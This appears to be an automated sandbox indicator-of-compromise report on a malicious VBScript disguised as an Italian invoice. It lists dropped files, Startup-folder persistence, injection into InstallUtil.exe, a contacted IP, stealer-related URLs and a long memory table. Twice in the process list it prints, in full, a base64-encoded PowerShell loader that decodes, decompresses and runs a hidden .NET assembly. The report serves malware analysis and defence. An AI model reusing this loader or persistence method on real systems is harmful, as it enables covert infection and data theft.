IOC Report
Fattura-24SC-99245969925904728562.vbs

loading gif

Files

File Path
Type
Category
Malicious
Fattura-24SC-99245969925904728562.vbs
ASCII text, with very long lines (65536), with no line terminators
initial sample
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\OSDescription.vbs
ASCII text, with very long lines (65536), with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05eouqb0.jr2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2nuhi4yi.ymc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ch103yy.jim.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5qlkpqgk.hpo.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\OSDescription.vbs.exe
PE32 executable (console) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Roaming\OSDescription.vbs:Zone.Identifier
ASCII text, with CRLF line terminators
modified
C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe
PE32 executable (console) Intel 80386, for MS Windows
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs"
malicious
C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe
"C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs"
malicious
C:\Users\user\AppData\Roaming\OSDescription.vbs.exe
"C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
malicious
C:\Windows\System32\cmd.exe
cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" /Y
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" /Y
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://duckduckgo.com/chrome_newtab
unknown
http://nuget.org/NuGet.exe
unknown
https://duckduckgo.com/ac/?q=
unknown
https://stackoverflow.com/q/14436606/23354
unknown
https://github.com/mgravell/protobuf-netJ
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/License
unknown
https://discordapp.com/api/v9/users/
unknown
https://contoso.com/Icon
unknown
https://github.com/mgravell/protobuf-net
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
https://www.ecosia.org/newtab/
unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
unknown
https://github.com/Pester/Pester
unknown
https://support.mozilla.org/products/firefox
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
https://github.com/mgravell/protobuf-neti
unknown
http://crl.micro
unknown
https://aka.ms/pscore6lB
unknown
https://stackoverflow.com/q/11564914/23354;
unknown
https://stackoverflow.com/q/2152978/23354
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
https://icanhazip.com/
unknown
https://nuget.org/nuget.exe
unknown
https://steamcommunity.com/profiles/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
There are 21 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
90.168.9.0.in-addr.arpa
unknown

IPs

IP
Domain
Country
Malicious
185.36.141.107
unknown
European Union

Memdumps

Base Address
Regiontype
Protect
Malicious
9F60000
trusted library section
page read and write
malicious
2F6C000
trusted library allocation
page read and write
malicious
2521000
trusted library allocation
page read and write
malicious
4BC5000
trusted library allocation
page read and write
malicious
5095000
trusted library allocation
page read and write
malicious
23E0000
trusted library section
page read and write
malicious
6420000
trusted library allocation
page read and write
5CC9000
stack
page read and write
2AC58BAA000
heap
page read and write
509A000
trusted library allocation
page read and write
1A57AB9E000
heap
page read and write
1A57AAB7000
heap
page read and write
542F000
trusted library allocation
page read and write
550C000
trusted library allocation
page read and write
227FF8B4000
heap
page read and write
2AC5D025000
heap
page read and write
2C3C000
heap
page read and write
4F5F000
trusted library allocation
page read and write
83F0000
trusted library allocation
page execute and read and write
1A578DAC000
heap
page read and write
36C7000
trusted library allocation
page read and write
2AC5CED8000
heap
page read and write
562F000
trusted library allocation
page read and write
740A000
heap
page read and write
586CEFE000
stack
page read and write
63F8000
trusted library allocation
page read and write
5DCE000
stack
page read and write
1A57AB9E000
heap
page read and write
1A57AB9E000
heap
page read and write
1A57D12C000
heap
page read and write
4DD0000
trusted library allocation
page read and write
1116000
heap
page read and write
1A57D104000
heap
page read and write
2410000
heap
page read and write
4E45000
trusted library allocation
page read and write
1A57C68D000
heap
page read and write
4F31000
trusted library allocation
page read and write
1A57AAA1000
heap
page read and write
61C2000
trusted library allocation
page read and write
551F000
trusted library allocation
page read and write
42D0000
trusted library allocation
page execute and read and write
1A57AAD8000
heap
page read and write
83B0000
heap
page execute and read and write
11C9000
heap
page read and write
341A000
trusted library allocation
page read and write
1A578DAB000
heap
page read and write
8F08000
trusted library allocation
page read and write
5638000
trusted library allocation
page read and write
352000
unkown
page readonly
2AC58B30000
heap
page read and write
2360000
trusted library allocation
page read and write
6560000
trusted library allocation
page read and write
4F74000
heap
page read and write
2AC5AB2B000
heap
page read and write
2AC5D0E2000
heap
page read and write
2AC5C715000
heap
page read and write
5168000
trusted library allocation
page read and write
7FFB1C2F6000
unkown
page readonly
54EE000
stack
page read and write
73B1000
heap
page read and write
758000
heap
page read and write
27BA000
trusted library allocation
page read and write
1A57C4FD000
heap
page read and write
11D4000
heap
page read and write
1A57AB47000
heap
page read and write
5040000
trusted library allocation
page read and write
4D5E000
trusted library allocation
page read and write
4E75000
trusted library allocation
page read and write
8670000
trusted library allocation
page read and write
69EB000
stack
page read and write
1A57ABE3000
heap
page read and write
2AC5D0B0000
heap
page read and write
4F20000
trusted library allocation
page read and write
2AC5CFD8000
heap
page read and write
8400000
trusted library allocation
page read and write
5B47000
heap
page read and write
371B000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
5A3D000
stack
page read and write
4E43000
trusted library allocation
page read and write
1A578CAA000
heap
page read and write
50EC000
trusted library allocation
page read and write
2AC5AAD7000
heap
page read and write
7F95000
trusted library allocation
page read and write
4CEE000
stack
page read and write
B3D35FE000
stack
page read and write
531E000
trusted library allocation
page read and write
5583000
trusted library allocation
page read and write
4F52000
trusted library allocation
page read and write
1A57D104000
heap
page read and write
1A578CA0000
heap
page read and write
485F000
stack
page read and write
2AC5D082000
heap
page read and write
2AC5CDCC000
heap
page read and write
1A57C79E000
heap
page read and write
598A000
stack
page read and write
5EFE000
stack
page read and write
2D60000
trusted library allocation
page read and write
5053000
trusted library allocation
page read and write
2AC5C771000
heap
page read and write
7270000
trusted library allocation
page read and write
1A57AB3B000
heap
page read and write
2F4F000
stack
page read and write
4D60000
heap
page execute and read and write
6B2E000
stack
page read and write
6EF0000
trusted library allocation
page read and write
69A000
trusted library allocation
page execute and read and write
2AC5C86F000
heap
page read and write
2D88000
trusted library allocation
page read and write
1A57C864000
heap
page read and write
1A578B20000
heap
page read and write
4F1C000
trusted library allocation
page read and write
2AC5AA7B000
heap
page read and write
227FFAB0000
heap
page read and write
2AC5AA8D000
heap
page read and write
3595000
trusted library allocation
page read and write
53B8000
trusted library allocation
page read and write
1A57C7DF000
heap
page read and write
2F70000
heap
page read and write
1A57AB57000
heap
page read and write
5651000
trusted library allocation
page read and write
9A80000
heap
page read and write
660000
heap
page read and write
2AC5D0D0000
heap
page read and write
750000
heap
page read and write
2AC5ABB3000
heap
page read and write
690000
trusted library allocation
page read and write
58C9000
trusted library allocation
page read and write
53D1000
trusted library allocation
page read and write
52B9000
trusted library allocation
page read and write
2F40000
trusted library allocation
page read and write
1A57AB77000
heap
page read and write
554D000
trusted library allocation
page read and write
507D000
trusted library allocation
page read and write
6570000
trusted library allocation
page execute and read and write
2AC5D01F000
heap
page read and write
2A76000
trusted library allocation
page execute and read and write
7FFB23B16000
unkown
page readonly
2AC5C51D000
heap
page read and write
2F59000
trusted library allocation
page read and write
1512000
trusted library allocation
page read and write
2AC5AA92000
heap
page read and write
8570000
heap
page read and write
4067000
trusted library allocation
page read and write
4CAE000
stack
page read and write
227FFACE000
heap
page read and write
5102000
trusted library allocation
page read and write
55E7000
trusted library allocation
page read and write
586C3FE000
stack
page read and write
1A57B1F7000
heap
page read and write
1A57D12F000
heap
page read and write
274E000
trusted library allocation
page read and write
27AE000
trusted library allocation
page read and write
77B000
heap
page read and write
82F000
heap
page read and write
646F000
trusted library allocation
page read and write
36D2000
trusted library allocation
page read and write
7FFB23B01000
unkown
page execute read
1A57C7E0000
heap
page read and write
2AC58BBB000
heap
page read and write
50F6000
trusted library allocation
page read and write
72C0000
trusted library allocation
page read and write
7FFB23B01000
unkown
page execute read
31E9000
trusted library allocation
page read and write
14E4000
trusted library allocation
page read and write
2AC5C937000
heap
page read and write
2AC5CED9000
heap
page read and write
4EA7000
trusted library allocation
page read and write
1A57D119000
heap
page read and write
2F80000
heap
page readonly
1A57AAD8000
heap
page read and write
2AC5C9C4000
heap
page read and write
1A57AB0B000
heap
page read and write
73FC000
heap
page read and write
B3D31A6000
stack
page read and write
55A0000
trusted library allocation
page read and write
1A57C8DF000
heap
page read and write
5315000
trusted library allocation
page read and write
1A57CF79000
heap
page read and write
6A2000
trusted library allocation
page read and write
52FE000
trusted library allocation
page read and write
1A57D057000
heap
page read and write
6FBD000
stack
page read and write
2AC5AB2E000
heap
page read and write
70E0000
trusted library allocation
page read and write
293F000
trusted library allocation
page read and write
1A57AB9B000
heap
page read and write
1A57C68E000
heap
page read and write
55C0000
trusted library allocation
page read and write
4D71000
trusted library allocation
page read and write
1A578D7C000
heap
page read and write
2AC5C61C000
heap
page read and write
4ECF000
trusted library allocation
page read and write
821E000
stack
page read and write
1A57AC9E000
heap
page read and write
523E000
stack
page read and write
2AC58BFE000
heap
page read and write
4DA0000
trusted library allocation
page read and write
4F37000
trusted library allocation
page read and write
1A57D132000
heap
page read and write
A340000
trusted library allocation
page execute and read and write
5AC0000
trusted library allocation
page read and write
340000
unkown
page readonly
6E1E000
stack
page read and write
2AC5ABB0000
heap
page read and write
1A57AC9E000
heap
page read and write
1A57AB9E000
heap
page read and write
1A57D08F000
heap
page read and write
5670000
trusted library allocation
page read and write
36C9000
trusted library allocation
page read and write
1A57AB9E000
heap
page read and write
5648000
trusted library allocation
page read and write
511A000
trusted library allocation
page read and write
5523000
trusted library allocation
page read and write
4F61000
trusted library allocation
page read and write
5ADC000
heap
page read and write
4D4B000
trusted library allocation
page read and write
2AC5D082000
heap
page read and write
1A578CAB000
heap
page read and write
2AC58B86000
heap
page read and write
2AC5D01F000
heap
page read and write
227FF90C000
heap
page read and write
5020000
heap
page read and write
6C60000
heap
page read and write
8550000
trusted library allocation
page read and write
1A57AB03000
heap
page read and write
2AC58BD5000
heap
page read and write
87E0000
trusted library allocation
page read and write
4DB7000
trusted library allocation
page read and write
2AC5D019000
heap
page read and write
72B0000
trusted library allocation
page read and write
2330000
trusted library allocation
page read and write
151B000
trusted library allocation
page execute and read and write
2AC5CDD9000
heap
page read and write
1A57AB9E000
heap
page read and write
2AC5C776000
heap
page read and write
4EC2000
trusted library allocation
page read and write
37A1000
trusted library allocation
page read and write
2AC5CCC7000
heap
page read and write
1A57C7FE000
heap
page read and write
2AC5AC2E000
heap
page read and write
50FC000
trusted library allocation
page read and write
478E000
stack
page read and write
73D1D000
unkown
page read and write
50E5000
trusted library allocation
page read and write
5111000
trusted library allocation
page read and write
4CFD000
stack
page read and write
6AAE000
stack
page read and write
5629000
trusted library allocation
page read and write
2AC5D019000
heap
page read and write
53DB000
trusted library allocation
page read and write
31A7000
trusted library allocation
page read and write
82C5000
trusted library allocation
page read and write
1A57D069000
heap
page read and write
1A57D12E000
heap
page read and write
564E000
trusted library allocation
page read and write
5422000
trusted library allocation
page read and write
691F000
stack
page read and write
5152000
trusted library allocation
page read and write
14F0000
trusted library allocation
page read and write
475E000
stack
page read and write
A030000
trusted library allocation
page execute and read and write
1A57C525000
heap
page read and write
52AB000
trusted library allocation
page read and write
2AC5BD81000
heap
page read and write
54BF000
trusted library allocation
page read and write
5150000
trusted library allocation
page read and write
2AC5B8C8000
heap
page read and write
516A000
trusted library allocation
page read and write
1A57C6DE000
heap
page read and write
1A57D10C000
heap
page read and write
1A57AB9E000
heap
page read and write
1A57AAE3000
heap
page read and write
52CA000
trusted library allocation
page read and write
1A57AAF7000
heap
page read and write
7800000
trusted library allocation
page read and write
2AC5C870000
heap
page read and write
1A57B6C3000
heap
page read and write
5579000
trusted library allocation
page read and write
2D30000
heap
page read and write
557B000
trusted library allocation
page read and write
535E000
trusted library allocation
page read and write
2AC5C4C8000
heap
page read and write
1A57D065000
heap
page read and write
55C6000
trusted library allocation
page read and write
1A57AB9E000
heap
page read and write
400000
remote allocation
page execute and read and write
4EFE000
stack
page read and write
2AC5CFE2000
heap
page read and write
1A578CA5000
heap
page read and write
2AC58B89000
heap
page read and write
4E94000
trusted library allocation
page read and write
2AC5BF87000
heap
page read and write
2AC5C96E000
heap
page read and write
2E20000
heap
page read and write
4E79000
trusted library allocation
page read and write
5B16000
heap
page read and write
7398000
heap
page read and write
3720000
trusted library allocation
page read and write
7080000
heap
page read and write
2AC58BAC000
heap
page read and write
1A57C58E000
heap
page read and write
1A57D083000
heap
page read and write
2AC5C5C5000
heap
page read and write
580D000
stack
page read and write
7F3E0000
trusted library allocation
page execute and read and write
722B000
stack
page read and write
703E000
stack
page read and write
1A7000
stack
page read and write
1A57CDA0000
heap
page read and write
557D000
trusted library allocation
page read and write
8560000
heap
page read and write
3439000
trusted library allocation
page read and write
4E60000
trusted library allocation
page read and write
6750000
trusted library allocation
page execute and read and write
814000
heap
page read and write
2AC5D0D2000
heap
page read and write
2AC58D85000
heap
page read and write
2A60000
trusted library allocation
page read and write
F16C9FE000
stack
page read and write
AB000
stack
page read and write
1A57D0CA000
heap
page read and write
1A578DD5000
heap
page read and write
7DB0000
trusted library allocation
page execute and read and write
3034000
trusted library allocation
page read and write
561A000
trusted library allocation
page read and write
63D0000
heap
page read and write
7FFB23B22000
unkown
page readonly
2AC5AA6B000
heap
page read and write
2AC58B11000
heap
page read and write
1A57AABF000
heap
page read and write
2AC5D0E6000
heap
page read and write
411F000
trusted library allocation
page read and write
7770000
trusted library allocation
page read and write
531B000
trusted library allocation
page read and write
4E41000
trusted library allocation
page read and write
5309000
trusted library allocation
page read and write
2AC58B84000
heap
page read and write
7031000
heap
page read and write
2AC5D0E2000
heap
page read and write
4DCA000
trusted library allocation
page read and write
7569000
trusted library allocation
page read and write
50FE000
trusted library allocation
page read and write
77B0000
trusted library allocation
page read and write
436C000
stack
page read and write
1A57AB23000
heap
page read and write
812000
heap
page read and write
586C9FE000
stack
page read and write
9C88000
trusted library allocation
page read and write
1A57C6F0000
heap
page read and write
5651000
trusted library allocation
page read and write
1A57C6A0000
heap
page read and write
2AC5AA68000
heap
page read and write
2AC5AB4C000
heap
page read and write
4E92000
trusted library allocation
page read and write
B3D3AFD000
stack
page read and write
1A57D0AB000
heap
page read and write
1A57D125000
heap
page read and write
33D2000
trusted library allocation
page read and write
A132000
heap
page read and write
53E8000
trusted library allocation
page read and write
2AC58B53000
heap
page read and write
AA11000
trusted library allocation
page read and write
1010000
heap
page read and write
4D60000
trusted library allocation
page read and write
5536000
trusted library allocation
page read and write
7371000
heap
page read and write
2AC58B2A000
heap
page read and write
56D0000
trusted library allocation
page execute and read and write
4EB8000
trusted library allocation
page read and write
9A88000
trusted library allocation
page read and write
5510000
trusted library allocation
page read and write
6B6B000
stack
page read and write
1A57AC2C000
heap
page read and write
2AC5D093000
heap
page read and write
4F3A000
trusted library allocation
page read and write
1170000
heap
page read and write
B3D3BFE000
stack
page read and write
6780000
heap
page read and write
53A1000
trusted library allocation
page read and write
7250000
trusted library allocation
page read and write
47CF000
stack
page read and write
8E41000
trusted library allocation
page read and write
1540000
trusted library allocation
page execute and read and write
9AA0000
heap
page read and write
54D4000
trusted library allocation
page read and write
696000
trusted library allocation
page execute and read and write
B3D38FF000
stack
page read and write
82E0000
trusted library allocation
page read and write
1A57D055000
heap
page read and write
1A57D0F0000
heap
page read and write
1A57AB9E000
heap
page read and write
377B000
trusted library allocation
page read and write
4FFF000
trusted library allocation
page read and write
6C0000
trusted library allocation
page read and write
434000
unkown
page readonly
53EC000
trusted library allocation
page read and write
1A57AAF7000
heap
page read and write
87F0000
heap
page execute and read and write
2AC5AA5F000
heap
page read and write
5364000
trusted library allocation
page read and write
A60000
trusted library allocation
page read and write
54BD000
trusted library allocation
page read and write
7D9F000
stack
page read and write
583C000
stack
page read and write
58A9000
trusted library allocation
page read and write
7E10000
trusted library allocation
page read and write
4F3D000
trusted library allocation
page read and write
2AC5D07B000
heap
page read and write
1A57D0F3000
heap
page read and write
37D7000
trusted library allocation
page read and write
2AC5CFD7000
heap
page read and write
4F29000
trusted library allocation
page read and write
2AC5AB70000
heap
page read and write
508D000
stack
page read and write
2A70000
trusted library allocation
page read and write
2AC5D093000
heap
page read and write
2AC5ABB0000
heap
page read and write
56B0000
trusted library allocation
page read and write
1567000
heap
page read and write
2AC5AB2E000
heap
page read and write
2F00000
trusted library allocation
page read and write
7B81000
trusted library allocation
page read and write
1510000
trusted library allocation
page read and write
551D000
trusted library allocation
page read and write
7FFB1C300000
unkown
page read and write
3496000
trusted library allocation
page read and write
2C8E000
heap
page read and write
4170000
trusted library allocation
page read and write
2AC9000
heap
page read and write
4E3E000
stack
page read and write
2AC5C57F000
heap
page read and write
1A57CC3A000
heap
page read and write
1A57C652000
heap
page read and write
5068000
trusted library allocation
page read and write
2AC5AA57000
heap
page read and write
54EB000
trusted library allocation
page read and write
2AC5C847000
heap
page read and write
5AE6000
heap
page read and write
36BE000
trusted library allocation
page read and write
8350000
heap
page read and write
52A1000
trusted library allocation
page read and write
6890000
trusted library allocation
page execute and read and write
4F24000
trusted library allocation
page read and write
4DB3000
trusted library allocation
page read and write
7090000
heap
page read and write
7FB8000
trusted library allocation
page read and write
5BAB000
heap
page read and write
509C000
trusted library allocation
page read and write
2AC5C51D000
heap
page read and write
50EE000
trusted library allocation
page read and write
5AD0000
heap
page read and write
402000
remote allocation
page execute and read and write
4F8C000
stack
page read and write
6260000
trusted library allocation
page execute and read and write
54F3000
trusted library allocation
page read and write
5386000
trusted library allocation
page read and write
760E000
stack
page read and write
6EBB000
stack
page read and write
29BF000
stack
page read and write
726E000
stack
page read and write
5044000
trusted library allocation
page read and write
2AC5CA6E000
heap
page read and write
53DD000
trusted library allocation
page read and write
2AC5AA8B000
heap
page read and write
1A57C4E0000
heap
page read and write
50DF000
trusted library allocation
page read and write
1A57AAD8000
heap
page read and write
2AC5AA83000
heap
page read and write
1A57ABA1000
heap
page read and write
5411000
trusted library allocation
page read and write
650000
trusted library allocation
page read and write
52FA000
trusted library allocation
page read and write
50AB000
trusted library allocation
page read and write
2AC58A90000
heap
page read and write
4D7D000
trusted library allocation
page read and write
1506000
trusted library allocation
page execute and read and write
50AF000
trusted library allocation
page read and write
4FD0000
heap
page read and write
2AC5AA37000
heap
page read and write
54EF000
trusted library allocation
page read and write
2A8E000
trusted library allocation
page read and write
3712000
trusted library allocation
page read and write
5840000
heap
page read and write
55F0000
trusted library allocation
page read and write
5630000
trusted library allocation
page read and write
7FFB1C2E0000
unkown
page readonly
1A57C6DE000
heap
page read and write
4D83000
trusted library allocation
page read and write
2AC5AB2E000
heap
page read and write
2A82000
trusted library allocation
page read and write
702D000
heap
page read and write
56B0000
trusted library allocation
page read and write
43D0000
heap
page read and write
227FF8B4000
heap
page read and write
2AC5AB2E000
heap
page read and write
2AC5D019000
heap
page read and write
52A9000
trusted library allocation
page read and write
5529000
trusted library allocation
page read and write
5345000
trusted library allocation
